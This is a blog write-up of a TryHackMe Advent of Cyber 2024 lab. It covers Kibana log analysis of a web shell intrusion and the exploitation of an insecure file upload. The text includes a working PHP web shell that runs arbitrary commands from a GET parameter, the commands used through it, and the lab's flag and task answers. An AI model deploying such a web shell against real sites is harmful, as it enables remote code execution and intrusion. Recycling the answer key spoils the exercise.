Advent of Cyber 2024 — Day 3: Log Analysis and RCE Vulnerability

Odiomonafe Jamal . A
2 min read · Dec 10, 2024


Today’s Advent of Cyber challenge focused on log analysis using ELK for blue-teaming and exploiting a file upload vulnerability for red-teaming. Below is a breakdown of the tasks, tools, and lessons learned.

Operation Blue: Investigating with ELK

Tools Used:

  • Kibana from the ELK stack for log analysis.
  • KQL (Kibana Query Language) for filtering and querying logs.

Steps:

  1. Access ELK:
  • Opened http://MACHINE_IP:5601 in the AttackBox browser.
  • Selected the frostypines-resorts collection in the Discover tab of Kibana.

  2. Set Time Range:
  • Defined the range from October 3, 2024, 11:30 to 12:00 to view the relevant logs.

  3. Filtered Logs:
  • Narrowed down logs based on suspicious activity by IP address and file names.
  • Identified access to shell.php within /media/images/rooms/.

  4. Insights:
  • Web Shell Location: /media/images/rooms/shell.php
  • Attacker IP Address: 10.11.83.34
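As an added example (not part of this write-up or the TryHackMe room), the same filtering done above in Kibana, expressed as a small Python script over constructed access-log lines: it keeps requests in the 11:30 to 12:00 window for executable files under /media/images/rooms/ and pulls out the "command" parameter the web shell reads. The log lines, the regular expression and the function names are assumptions; only the path and the attacker IP come from the write-up.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (not taken from the room's ELK data);
# the web-shell path and the attacker IP match the write-up, the rest is made up.
SAMPLE_LOG = """\
10.9.1.12 - - [03/Oct/2024:11:31:07 +0000] "GET /media/images/rooms/room1.jpg HTTP/1.1" 200 51234
10.11.83.34 - - [03/Oct/2024:11:41:22 +0000] "POST /profile/upload HTTP/1.1" 302 0
10.11.83.34 - - [03/Oct/2024:11:42:05 +0000] "GET /media/images/rooms/shell.php?command=ls HTTP/1.1" 200 311
10.11.83.34 - - [03/Oct/2024:11:42:31 +0000] "GET /media/images/rooms/shell.php?command=cat%20flag.txt HTTP/1.1" 200 27
10.9.1.13 - - [03/Oct/2024:12:15:00 +0000] "GET /media/images/rooms/shell.php HTTP/1.1" 200 120
"""

# Investigation window from the write-up: 3 Oct 2024, 11:30 to 12:00 (assumed UTC)
WINDOW_START = datetime(2024, 10, 3, 11, 30, tzinfo=timezone.utc)
WINDOW_END = datetime(2024, 10, 3, 12, 0, tzinfo=timezone.utc)
UPLOAD_DIR = "/media/images/rooms/"      # where uploaded "profile pictures" land
EXEC_EXT = (".php", ".phtml", ".phar")   # extensions a PHP-enabled server may execute
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse one combined-log-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlparse(m["target"])
    return {"ip": m["ip"], "ts": ts, "path": url.path,
            "query": parse_qs(url.query), "status": int(m["status"])}

def find_webshell_hits(log_text, start=WINDOW_START, end=WINDOW_END):
    """Requests inside the window for executable files under the upload directory."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not (start <= rec["ts"] <= end):
            continue
        if rec["path"].startswith(UPLOAD_DIR) and rec["path"].lower().endswith(EXEC_EXT):
            cmd = rec["query"].get("command", [None])[0]   # the shell's GET parameter
            hits.append((rec["ip"], rec["path"], cmd))
    return hits

if __name__ == "__main__":
    for ip, path, cmd in find_webshell_hits(SAMPLE_LOG):
        print(f"{ip} requested {path} command={cmd!r}")
```

The request at 12:15 falls outside the window and the image request is not executable, so only the two shell.php hits from 10.11.83.34 remain.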

Operation Red: Exploiting the Vulnerability

Objective: Exploit an insecure file upload vulnerability on the Frosty Pines Resort website to retrieve the flag.txt.

Steps:

  1. Set Up:
  • Edited the /etc/hosts file on the AttackBox to reference frostypines.thm:
echo "MACHINE_IP frostypines.thm" >> /etc/hosts

  2. Crafted Malicious PHP File:
  • Created a file named shell.php with the following code, using Sublime Text on the AttackBox:
<html>
<body>
<form method="GET">
  <input type="text" name="command" autofocus id="command" size="50">
  <input type="submit" value="Execute">
</form>
<pre>
<?php
// Runs whatever the "command" query parameter holds and shows its output
// (stderr merged into stdout) inside the <pre> block.
if (isset($_GET['command'])) {
    system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>

  3. Exploited File Upload:
  • Uploaded shell.php as a "profile picture."
  • Accessed the script via the URL /media/images/rooms/shell.php.

  4. Executed Commands via Web Shell:
  • Navigated to the directory containing flag.txt using commands like:
pwd
ls
cat flag.txt
  • Retrieved the contents of flag.txt:
THM{Gl1tch_Was_H3r3}

TASKS

  1. Where was the web shell uploaded to? /media/images/rooms/shell.php
  2. What IP address accessed the web shell? 10.11.83.34
  3. What is the content of flag.txt? THM{Gl1tch_Was_H3r3}

Lessons Learned

  1. Log Analysis Best Practices:
  • ELK is a powerful tool for centralizing and analyzing logs.
  • KQL simplifies narrowing down search criteria in extensive datasets.

  2. Vulnerabilities in File Uploads:
  • Web applications must validate file types, size, and contents to prevent malicious uploads.
  • Disallow execution of uploaded files by properly configuring web server permissions.

  3. Exploitation Awareness:
  • Understanding RCE helps defenders anticipate attack vectors.
  • Regular audits and penetration tests can help identify these flaws before attackers do.

This task provided valuable hands-on experience in blue and red teaming, and insights into the ELK
